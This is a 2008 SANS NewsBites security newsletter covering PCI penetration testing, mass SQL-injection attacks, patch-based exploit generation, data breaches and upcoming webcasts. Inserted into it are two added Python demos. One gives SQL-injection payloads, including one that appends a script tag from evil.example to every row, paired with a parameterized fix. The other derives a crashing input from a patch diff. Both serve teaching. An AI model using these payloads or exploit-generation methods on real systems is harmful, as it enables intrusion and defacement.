Yesterday in a presentation to the Commission on Cyber Security for the
44th President, the US national Y2K Czar, John Koskinen, shared an
insight that may explain why some standards and audit techniques are
more useful than others. He told the Commission members that, near the
end of the Y2K process they were able to tell organizations exactly what
needed to be done and how much was enough. He got all the experts to
agree on what needed to be done by first finding which threats actually
mattered and then focusing the work on making sure those were
eliminated. This is relevant in security because PCI does that
(identifying which attack vectors are actually being used) and other
standards organizations, like NIST, fail to do that. PCI isn't perfect,
but a PCI audit is widely seen as much more effective than the
unreliable audits done under the looser standards. This may also be why
the NSA Blue Teams do so much better assessments than other auditors.
They know how the real attacks are being carried out so they measure
what matters.
Alan
*************************************************************************
SANS NewsBites April 29, 2008 Vol. 10, Num. 34
*************************************************************************
TOP OF THE NEWS
PCI Update Requires Both Network and Application Penetration Testing
Microsoft Says SQL-Injection Attacks Not Due to Flaws in Their
Products; Rather Due To Application Programming Errors
Researchers Call for Microsoft to Revamp Patch Distribution System
FBI Wants ISPs to Retain User Data for at Least Two Years
THE REST OF THE WEEK'S NEWS
WORMS, ACTIVE EXPLOITS, VULNERABILITIES & PATCHES
New Zero-Day Flaw in QuickTime
Malware Authors Invoke Licensing Agreements
ATTACKS, INTRUSIONS, DATA THEFT & LOSS
30,000 Bank of Ireland Customers Affected by Laptop Theft
SCSU Faces Another Data Breach
Maryland State Highway Administration Employee Data Exposed
Banking Details Stolen from NY WiseBuys Store
MISCELLANEOUS
Lockheed-Martin Moves To Ensure Programmers on Federal Projects Have
Proven Secure Coding Skills
LIST OF UPCOMING FREE SANS WEBCASTS
******************** Sponsored By Sourcefire, Inc. **********************
SC Magazine Names Snort(r) "Best Network Security."
Learn how Snort is the engine powering the Sourcefire 3D(tm) System.
This IPS is different from others because it shows you everything
running on your network in real time. It also gives you context for
your security events. Know more real threats. No more wild goose
chases. Call 1.800.917.4134 today.
http://www.sans.org/info/28373
*************************************************************************
TRAINING UPDATE
Where can you find the newest Penetration Testing techniques,
Application Pen Testing, Hacker Exploits, Secure Web Application
Development, Security Essentials, Forensics, Wireless, Auditing, both
new Pen Testing courses, CISSP, and SANS' other top-rated courses plus
evening sessions with Internet Storm Center handlers.
- - SANSFIRE 2008 in Washington DC (7/22-7/31) SANS' biggest summer program
with many bonus sessions and a big exhibition of security products:
http://www.sans.org/info/26774
- - London (6/2-6/7) and Amsterdam (6/16-6/21)
http://www.sans.org/secureeurope08
- - San Diego (5/9-5/16) http://www.sans.org/securitywest08
- - Toronto (5/10-5/16) http://www.sans.org/toronto08
- - and in 100 other cites and on line any time: www.sans.org
*************************************************************************
TOP OF THE NEWS
--PCI Update Requires Both Network and Application Penetration Testing
(April 22, 2008)
The Payment Card Industry Data Security Standards, which are being
closely followed by tens of thousands of governments and commercial
organizations and schools around the world, were updated to clarify what
the required penetration testing must cover: "Penetration testing is
different than the external and internal vulnerability assessments. A
vulnerability assessment simply identifies and reports noted
vulnerabilities, whereas a penetration test attempts to exploit the
vulnerabilities to determine whether unauthorized access or other
malicious activity is possible. Penetration testing should include
network *and* application layer testing as well as controls and
processes around the networks and applications, and should occur from
both outside the network trying to come in (external testing) and from
inside the network." The Dark Reading article also explains where best
practices for penetration testing can be learned.
http://www.darkreading.com/document.asp?doc_id=152115&WT.svl=news1_1
https://www.pcisecuritystandards.org/pdfs/04-22-08.pdf
https://www.pcisecuritystandards.org/pdfs/infosupp_11_3_penetration_testing.pdf
[Editor's Note (Paller): PCI does the best job anywhere of analyzing
attacks and updating its standards to ensure the newest attack vectors
are being adequately blocked. They did it again last week by adding
application security penetration testing to network pen testing. Sadly,
network pen testing techniques consistently fail to uncover important
application security flaws; app pen testing requires different skills.
The best place to learn those skills is at the Web Application Security
Summit and the associated Web Application Pen Testing Course in Las
Vegas in late May.
The course: http://www.sans.org/appsec08_summit/description.php?tid=1972
The overall Summit: http://www.sans.org/appsec08_summit/ ]
--Microsoft Says SQL-Injection Attacks Not Due to Flaws in Their
Products; Rather Due To Application Programming Errors
(April 27 & 28, 2008)
Microsoft maintains that the SQL-injection attacks spreading to hundreds
of thousands of web pages are not due to new or unknown vulnerabilities
in its Internet Information Server (IIS) or SQL Server. The Microsoft
Security Response Center's Bill Sisk said the attacks are the result of
SQL injection exploits and proffered a set of industry best practices
for organizations to follow to protect themselves from such attacks.
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9080678&source=rss_topic17
http://www.news.com/8301-10784_3-9929861-7.html?part=rss&subj=news&tag=2547-1_3-0-20
http://www.heise-online.co.uk/security/Microsoft-offers-assistance-to-combat-mass-SQL-injection--/news/110616
http://blogs.technet.com/msrc/archive/2008/04/25/questions-about-web-server-attacks.aspx
[Editor's Note (Paller): The Microsoft guidance for programmers on how
to avoid programming errors that enable SQL Injection attacks (posted
at http://msdn2.microsoft.com/en-us/library/ms998271.aspx) is excellent.
These guidelines reflect the skills that are now being tested for Java
and soon for .NET programmers. If you have more than 300 programmers,
you can have up to 10 of them use the free online skills assessment to
find their skills gaps. Email spa@sans.org ]
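The programming error Microsoft points to above, shown as an added example (this is not code from the page, from Microsoft, or from the attackers): a product lookup that concatenates a request value into the SQL text, beside the parameterized form that the MSDN guidance recommends. The table, its rows, the two payloads and the script URL on evil.example are constructed for the demo; sqlite3 stands in for SQL Server, and `executescript` imitates a database API that accepts stacked statements, which is what let the 2008 mass attacks append a script tag to every text column.

```python
import sqlite3

# Constructed sample data for this example; not taken from the original page.
PRODUCTS = [
    (1, "Widget", "public"),
    (2, "Gadget", "public"),
    (3, "Internal pricing sheet", "restricted"),
]

# Hypothetical attacker-controlled values, as they might arrive in a query string.
BYPASS_PAYLOAD = "1 OR 1=1"
DEFACE_PAYLOAD = ("1; UPDATE products SET name = name || "
                  "'<script src=\"http://evil.example/x.js\"></script>'")


def make_db() -> sqlite3.Connection:
    """Build an in-memory table with public and restricted rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, "
                 "visibility TEXT, hits INTEGER DEFAULT 0)")
    conn.executemany("INSERT INTO products (id, name, visibility) VALUES (?, ?, ?)",
                     PRODUCTS)
    return conn


def lookup_vulnerable(conn, product_id: str):
    """The programming error: the request value is pasted into the SQL text, so the
    caller controls part of the statement, not just a value. '1 OR 1=1' turns the
    WHERE clause into (visibility = 'public' AND id = 1) OR 1=1, exposing every row."""
    sql = ("SELECT id, name FROM products WHERE visibility = 'public' AND id = "
           + product_id)
    return conn.execute(sql).fetchall()


def count_hit_vulnerable(conn, product_id: str) -> None:
    """Same error through an API that runs several statements at once: the attacker
    appends a second statement that rewrites every row, the shape of the mass attacks."""
    conn.executescript("UPDATE products SET hits = hits + 1 WHERE id = " + product_id)


def lookup_parameterized(conn, product_id: str):
    """The fix: validate the type, then bind the value as a parameter. The SQL text is
    constant, so no input can change the WHERE clause or add statements."""
    if not product_id.isdigit():
        raise ValueError("product id must be a non-negative integer")
    sql = "SELECT id, name FROM products WHERE visibility = 'public' AND id = ?"
    return conn.execute(sql, (int(product_id),)).fetchall()


def count_hit_parameterized(conn, product_id: str) -> None:
    """Parameterized UPDATE; sqlite3's execute() also refuses stacked statements."""
    if not product_id.isdigit():
        raise ValueError("product id must be a non-negative integer")
    conn.execute("UPDATE products SET hits = hits + 1 WHERE id = ?", (int(product_id),))


def demo() -> dict:
    """Run both variants against the same payloads and report what each exposed."""
    conn = make_db()
    leaked = lookup_vulnerable(conn, BYPASS_PAYLOAD)       # restricted row included
    count_hit_vulnerable(conn, DEFACE_PAYLOAD)              # every name gets a script tag
    defaced = [name for (name,) in conn.execute("SELECT name FROM products")]

    safe = make_db()
    try:
        lookup_parameterized(safe, BYPASS_PAYLOAD)
        bypass_blocked = False
    except ValueError:
        bypass_blocked = True
    try:
        count_hit_parameterized(safe, DEFACE_PAYLOAD)
        deface_blocked = False
    except ValueError:
        deface_blocked = True
    intact = [name for (name,) in safe.execute("SELECT name FROM products")]
    return {
        "leaked_ids": sorted(row[0] for row in leaked),
        "defaced_rows": sum("<script" in n for n in defaced),
        "bypass_blocked": bypass_blocked,
        "deface_blocked": deface_blocked,
        "intact_rows": sum("<script" in n for n in intact),
        "legit_lookup": lookup_parameterized(safe, "1"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The input check in the parameterized functions is belt and braces: binding alone already prevents the injection, but rejecting non-numeric ids keeps garbage out of the log and makes the intent of the parameter explicit.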
--Researchers Call for Microsoft to Revamp Patch Distribution System
(April 23 & 25, 2008)
Computer science researchers from Carnegie Mellon University, the
University of California at Berkeley, and the University of Pittsburgh
are urging Microsoft to redesign its patch distribution system. The
four researchers have developed a technique that they call automatic
patch-based exploit generation (APEG), which compares vulnerable and
patched versions of a program to create attack code for the flaw the
patch fixes; an attacker who obtains a patch before everyone has
applied it could use the same technique. The group offers several
suggestions for making such an attack more difficult, "including
obfuscating the code, encrypting the patches and waiting to distribute
the key simultaneously, and using peer-to-peer distribution to push out
patches faster."
http://www.securityfocus.com/news/11514
http://www.heise-online.co.uk/security/Automatic-exploits-by-patch-analysis--/news/110612
http://www.cs.cmu.edu/~dbrumley/pubs/apeg.html
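A toy version of the idea behind APEG, added here as an illustration and not the researchers' code: the real technique works on binaries with symbolic execution and a constraint solver, whereas this diffs two hypothetical Python parsers, pulls out the check the patch added, and brute-forces the one-byte length that satisfies it, then confirms by differential testing that the candidate crashes the old build and not the new one. The parser, its 32-byte buffer, and the OverflowError that stands in for memory corruption are all assumptions made for the example.

```python
import difflib
import inspect
import re


def parse_record_v1(data: bytes) -> bytes:
    """Pre-patch parser (hypothetical). Byte 0 is a length, the rest is payload,
    copied into a 32-byte buffer with no bounds check. OverflowError stands in
    for the memory corruption a C implementation would suffer."""
    n = data[0]
    payload = data[1:1 + n]
    if len(payload) > 32:
        raise OverflowError("buffer overrun")
    return payload


def parse_record_v2(data: bytes) -> bytes:
    """Patched parser: identical except for the added bounds check on n."""
    n = data[0]
    if n > 32:
        return b""
    payload = data[1:1 + n]
    if len(payload) > 32:
        raise OverflowError("buffer overrun")
    return payload


def added_checks(old_fn, new_fn) -> list:
    """Diff the two versions and return the condition of every `if` the patch added.
    APEG does this on binaries; here the 'patch' is a source-level unified diff."""
    diff = difflib.unified_diff(
        inspect.getsource(old_fn).splitlines(),
        inspect.getsource(new_fn).splitlines(),
        lineterm="",
    )
    return [m.group(1) for line in diff if (m := re.match(r"\+\s*if (.+):$", line))]


_CMP = re.compile(r"^(\w+)\s*(>=|<=|>|<|==|!=)\s*(\d+)$")
_OPS = {
    ">": lambda v, k: v > k, "<": lambda v, k: v < k,
    ">=": lambda v, k: v >= k, "<=": lambda v, k: v <= k,
    "==": lambda v, k: v == k, "!=": lambda v, k: v != k,
}


def solve_condition(cond: str, lo: int = 0, hi: int = 255) -> int:
    """Return a value that SATISFIES the added check, i.e. an input the patch now
    rejects and the old code therefore mishandled. The variable is a single byte,
    so exhaustive search replaces the constraint solver APEG uses."""
    m = _CMP.match(cond.strip())
    if not m:
        raise ValueError(f"unsupported condition: {cond!r}")
    op, k = m.group(2), int(m.group(3))
    for v in range(lo, hi + 1):
        if _OPS[op](v, k):
            return v
    raise ValueError(f"{cond!r} has no solution in [{lo}, {hi}]")


def generate_exploit(old_fn, new_fn) -> bytes:
    """Build a candidate input from the first check the patch added: the chosen
    length byte followed by that many filler bytes."""
    n = solve_condition(added_checks(old_fn, new_fn)[0])
    return bytes([n]) + b"A" * n


def run_both(old_fn, new_fn, data: bytes) -> dict:
    """Differential test: does the candidate crash the old build but not the new one?"""
    def outcome(fn):
        try:
            fn(data)
            return "handled"
        except OverflowError:
            return "crash"
    return {"old": outcome(old_fn), "new": outcome(new_fn)}


if __name__ == "__main__":
    print("added checks:", added_checks(parse_record_v1, parse_record_v2))
    candidate = generate_exploit(parse_record_v1, parse_record_v2)
    print("candidate:", candidate[:8], "...", len(candidate), "bytes")
    print(run_both(parse_record_v1, parse_record_v2, candidate))
```

The point the researchers make follows directly from the last step: once a diff reveals the added check, the input that violates it is the exploit trigger, so any window between patch release and patch application is a window in which the patch itself is the best available vulnerability description.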
--FBI Wants ISPs to Retain User Data for at Least Two Years
(April 23, 2008)
At a hearing last week, FBI Director Robert Mueller told the US House
Judiciary Committee that Internet service providers (ISPs) should be
required to retain user activity data for at least two years. The idea
has bipartisan support in the legislature. Despite the recent hearing
and earlier efforts to mandate ISP data retention, it is still unclear
what sort of information would be retained. A data retention law could
require ISPs to keep information about IP addresses assigned to users,
but could also mean that the companies have to hold on to information
related to email, instant messaging, and which web sites were visited.
Current practices have ISPs discarding data that are not required for
business reasons; exceptions are made when law enforcement authorities
are conducting an investigation.
http://www.news.com/8301-13578_3-9926803-38.html
********************** Sponsored Links: *******************************
1) Top 10 Security Vulnerabilities in your .NET configuration files:
Are your web applications vulnerable? Find out!
http://www.sans.org/info/28378
2) By converging networking and security, StillSecure provides
intelligent networks that are easy to manage and protect.
http://www.sans.org/info/28383
3) Listen to SANS Special webcast, Security Insights with Dr. Eric Cole.
This month's topic: Data Leakage prevention
http://www.sans.org/info/28388
*************************************************************************
THE REST OF THE WEEK'S NEWS
WORMS, ACTIVE EXPLOITS, VULNERABILITIES & PATCHES
--New Zero-Day Flaw in QuickTime
(April 28, 2008)
Security consultants at GNUCitizen say they have notified Apple of a
flaw in its QuickTime media player that can be exploited to take control
of vulnerable PCs. Attackers would need to manipulate users into
visiting a maliciously crafted website, or opening a malicious email
attachment or media file. The remotely exploitable vulnerability
reportedly affects Windows Vista Service Pack 1 and Windows XP Service
Pack 2; other versions may be vulnerable as well.
http://www.cio.com/article/342613/Researcher_Finds_New_F
http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=207402200
--Malware Authors Invoke Licensing Agreements
(April 28, 2008)
In a strange twist on copyright enforcement, malware authors are taking
steps to protect their products. According to help files that accompany
one malware package, the organization selling it says that if those
using the malware violate the licensing agreement, the organization will
send code samples to anti-virus companies. The licensing agreement also
requires purchasers to pay for product updates that do not address bugs
and forbids them from reverse engineering the malware code or sharing
it with others.
http://www.theregister.co.uk/2008/04/28/malware_copyright_notice/
[Editor's Note (Schultz): The provision that if license agreements are
violated, malware authors will turn code samples over to anti-virus
vendors seems very contrary to malware authors' interests. The more code
from a malware tool that anti-virus vendors have, the better their
ability to detect and eradicate the tool is. I would think that this
would greatly diminish the potential attractiveness of the tool in the
eyes of potential buyers.
(Schmidt): I wonder if we will see them in front of "Judge Judy" someday
(A daytime US TV show where people resolve their legal disputes in a "TV
Court").]
ATTACKS, INTRUSIONS, DATA THEFT & LOSS
--30,000 Bank of Ireland Customers Affected by Laptop Theft
(April 28, 2008)
The theft of four laptops containing Bank of Ireland customer
information is now believed to affect as many as 30,000 people; the
figure was initially given as 10,000. The compromised data include
medical records, bank account information, names and addresses. The
breach affects both life assurance customers and mortgage holders
and affects customers at 29 branches, instead of just seven, as was
initially reported.
http://www.rte.ie/news/2008/0428/boi.html
--SCSU Faces Another Data Breach
(April 25 & 28, 2008)
Southern Connecticut State University is notifying approximately 11,000
individuals that their personal data were compromised when an intruder
gained access to a university server holding their Social Security
numbers (SSNs) and other personal information. The intruder was using
the server to help run a spam scheme. This is the second data security
breach that SCSU has faced in recent weeks; a laptop stolen from a
consultant held personally identifiable information of students at 18
colleges and universities, including SCSU.
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9080380&source=rss_topic17
http://chronicle.com/wiredcampus/index.php?id=2940
http://chronicle.com/free/2008/04/2619n.htm
[Editor's Note (Schmidt): These are happening so frequently I do not
know why this is even "News" anymore. All the more reason not to permit
social security numbers to be used as personal identifiers.]
--Maryland State Highway Administration Employee Data Exposed
(April 25, 2008)
Maryland's State Highway Administration (SHA) is informing approximately
1,800 employees that their personal information was compromised. An
employee transferred the data, which include names and SSNs, from a
secure drive to a shared drive. The SHA is removing SSNs from personnel
files.
http://www.wbaltv.com/news/15998781/detail.html
--Banking Details Stolen from NY WiseBuys Store
(April 24 & 25, 2008)
Police in Canton, New York are investigating the theft of nearly US
$100,000 that appears to stem from a computer intrusion at the Canton
WiseBuys store. The attack occurred while the store was changing from
one computer system to another in December 2007. The intruder was able
to access sensitive personal information, including bank account
numbers, of hundreds of the store's customers. The cyber thieves used
the information to create clones of the customers' cards and stole funds
from accounts at several Canton banks. The fraudulent transactions
range from US $10 up to US $3,000.
http://www.wwnytv.net/index.php/2008/04/24/feedback-police-investigate-identity-theft-of-canton-wisebuys-customers/
http://www.newswatch50.com/news/local/story.aspx?content_id=af161116-25f2-4a78-ab2e-c730e28cc4bb
http://www.watertowndailytimes.com/article/20080425/NEWS05/133127784
MISCELLANEOUS
--Lockheed-Martin Moves To Ensure Programmers on Federal Projects Have
Proven Secure Coding Skills
(April 28, 2008)
Lockheed Martin has set a new standard for federal contractors by moving
to assess the secure coding skills of its programmers, provide training
to improve their skills, and certify its developers through a rigorous
certification exam.
http://www.darkreading.com/document.asp?doc_id=152167&WT.svl=wire_4
http://news.moneycentral.msn.com/ticker/article.aspx?Feed=PR&Date=20080428&ID=8549368&Symbol=US:LMT
http://www.ddj.com/cpp/207402332?cid=RSSfeed_DDJ_Cpp
UPCOMING SANS WEBCAST SCHEDULE
SANS Special Webcast: The Little Hybrid Web Worm That Could
WHEN: Wednesday, April 30, 2008 at 1:00 PM EDT (1700 UTC/GMT)
FEATURING: Billy Hoffman
http://www.sans.org/info/24614
Sponsored By: HP
This webcast examines the possibility of hybrid web worms which use
several methods to overcome the limitations of current web worms.
Specifically the authors examine how a hybrid web worm: mutates itself
to evade defenses; updates itself with new attack vectors while in the
wild; and finds and exploits targets regardless of whether they are
client web browsers or web servers.
***
WhatWorks in Intrusion Detection and Prevention: Easing the Pains of PCI
Compliance at AirTran Airways:
WHEN: Tuesday, May 06, 2008 at 1:00 PM EDT (UTC/GMT)
FEATURING: Alan Paller and Michelle Stewart
http://www.sans.org/info/27099
Sponsored By: Lancope http://www.lancope.com/
Looking for a solution to ease the pains of PCI compliance, the data
security manager for AirTran Airways needed a product that provided
increased visibility into network behavior and accountability. It had
to be behavior based and capable of collecting information from a widely
dispersed network. She found a solution that was scalable,
cost-effective and helps to quickly identify and resolve network and
security issues.
***
****This Webcast was previously scheduled for 4/15/08****
NEW DATE/TIME: Wednesday, May 7, 2008 at 1:00pm EDT (1700 UTC/GMT)
FEATURING: Dr. Eric Cole and Michael Yaffe
http://www.sans.org/info/25519
Sponsored By: Core Security http://www.coresecurity.com/
The information security world is taxing. We spend a lot of time fixing
problems that often don't stay fixed. New vulnerabilities are discovered
daily, and applying one update or patch sometimes exposes weaknesses
elsewhere. We hope that our IPS and firewalls can cover while we try to
keep up, but how do we really know that things are working the way they
should be?
***
Ask the Expert Webcast: Enterprise Incident Management with Security
Monitoring
WHEN: Thursday, May 8, 2008 at 1:00 PM EDT (1700 UTC/GMT)
FEATURING: Adrien de Beaupre
http://www.sans.org/info/27104
Sponsored By: Prism MicroSystems http://www.prismmicrosys.com/
Some of the issues revolving around log management include privacy,
storage requirements, and meeting regulatory or legislative
requirements. Finally, integration of LM into an organization's overall
security dashboard will be the focus of this presentation.
***
Internet Storm Center Webcast: Threat Update
WHEN: Wednesday, May 14, 2008 at 1:00 PM EDT (1700 UTC/GMT)
FEATURING: Johannes Ullrich
http://www.sans.org/info/27109
Sponsored By: Core Security http://www.coresecurity.com/
The SANS Internet Storm Center (ISC) uses advanced data correlation and
visualization techniques to analyze data collected from thousands of
sensors in over sixty countries. Experienced analysts constantly monitor
the Storm Center data feeds searching for trends and anomalies in order
to identify potential threats. When a threat is identified, the team
immediately begins an intensive investigation to gauge the threat's
severity and impact. This monthly webcast discusses recent threats
observed by the Internet Storm Center, and discusses new software
vulnerabilities or system exposures that were disclosed over the past
month. The general format is about 30 minutes of presentation by senior
ISC staff, followed by a question and answer period.
***
Security Inside the Perimeter: Confronting the Gap Between Talking About the
Threat and Doing Something About it
WHEN: Thursday, May 15, 2008 at 1:00 PM EDT (1700 UTC/GMT)
FEATURING: Paul Smith
http://www.sans.org/info/27114
Sponsored By: PacketMotion http://www.packetmotion.com/
Most security and IT professionals agree that the corporate network
"perimeter" is no longer viable due to laptops, tunneling applications,
VPNs and wireless, etc. But network security conventional wisdom is
still very perimeter oriented. Why the inconsistency? Perhaps people
really don't think the problem is that significant and the risk is not
that high. Or maybe they do think it's a real problem, but hesitate to
act because of cost, complexity, and risk to application availability.
This webinar will review the key aspects of this inconsistency and offer
solutions to better manage the "inside risk."
*******************************************************************
Be sure to check out the following FREE SANS archived webcasts:
Tool Talk Webcast: The ABC's of Dealing with Unique Network Security
Risks in a World of Open Campus Networks
WHEN: Wednesday, March 5, 2008 at 1:00 PM EST (1800 UTC/GMT)
FEATURING: Brian Mehlman
http://www.sans.org/info/22979
Sponsored By: Q1 Labs
SANS Special Webcast: A Response to the "Cold Boot Attack" Announcement
WHEN: Thursday, March 6, 2008 at 3:00 PM EST (1900 UTC/GMT)
FEATURING: John Strand
https://www.sans.org/webcasts/show.php?webcastid=91884
********************************************************************
The Editorial Board of SANS NewsBites
Eugene Schultz, Ph.D., CISM, CISSP is CTO of High Tower Software and the
author/co-author of books on Unix security, Internet security, Windows
NT/2000 security, incident response, and intrusion detection and
prevention. He was also the co-founder and original project manager of
the Department of Energy's Computer Incident Advisory Capability (CIAC).
John Pescatore is Vice President at Gartner Inc.; he has worked in
computer and network security since 1978.
Stephen Northcutt founded the GIAC certification and currently serves
as President of the SANS Technology Institute, a post graduate level IT
Security College, www.sans.edu.
Johannes Ullrich is Chief Technology Officer of the Internet Storm
Center.
Howard A. Schmidt served as CSO for Microsoft and eBay and as Vice-Chair
of the President's Critical Infrastructure Protection Board.
Ed Skoudis is co-founder of Intelguardians, a security research and
consulting firm, and author and lead instructor of the SANS Hacker
Exploits and Incident Handling course.
Tom Liston is a Senior Security Consultant and Malware Analyst for
Intelguardians, a handler for the SANS Institute's Internet Storm
Center, and co-author of the book Counter Hack Reloaded.
Dr. Eric Cole is an instructor, author and fellow with The SANS
Institute. He has written five books, including Insider Threat and he
is a senior Lockheed Martin Fellow.
Bruce Schneier has authored eight books -- including BEYOND FEAR and
SECRETS AND LIES -- and dozens of articles and academic papers. Schneier
has regularly appeared on television and radio, has testified before
Congress, and is a frequent writer and lecturer on issues surrounding
security and privacy.
Mason Brown is one of a very small number of people in the information
security field who have held a top management position in a Fortune 50
company (Alcoa). He is leading SANS' global initiative to improve
application security.
Marcus J. Ranum built the first firewall for the White House and is
widely recognized as a security products designer and industry
innovator.
Mark Weatherford, CISSP, CISM, is the Chief Information Security Officer
for the State of Colorado.
Alan Paller is director of research at the SANS Institute.
Clint Kreitner is the founding President and CEO of The Center for
Internet Security.
Rohit Dhamankar is the Lead Security Architect at TippingPoint, a
division of 3Com, and authors the critical vulnerabilities section of
the weekly SANS Institute's @RISK newsletter and is the project manager
for the SANS Top20 2005 and the Top 20 Quarterly updates.
Koon Yaw Tan is Assistant Director at Monetary Authority of Singapore
(MAS) and a handler for the SANS Institute's Internet Storm Center.
Gal Shpantzer is a trusted advisor to several successful IT outsourcing
companies and was involved in multiple SANS projects, such as the
E-Warfare course and the Business Continuity Step-by-Step Guide.
Brian Honan is an independent security consultant based in Dublin,
Ireland.
Roland Grefer is an independent consultant based in Clearwater, Florida.
Please feel free to share this with interested parties via email, but
no posting is allowed on web sites. For a free subscription, (and for
free posters) or to update a current subscription, visit
http://portal.sans.org/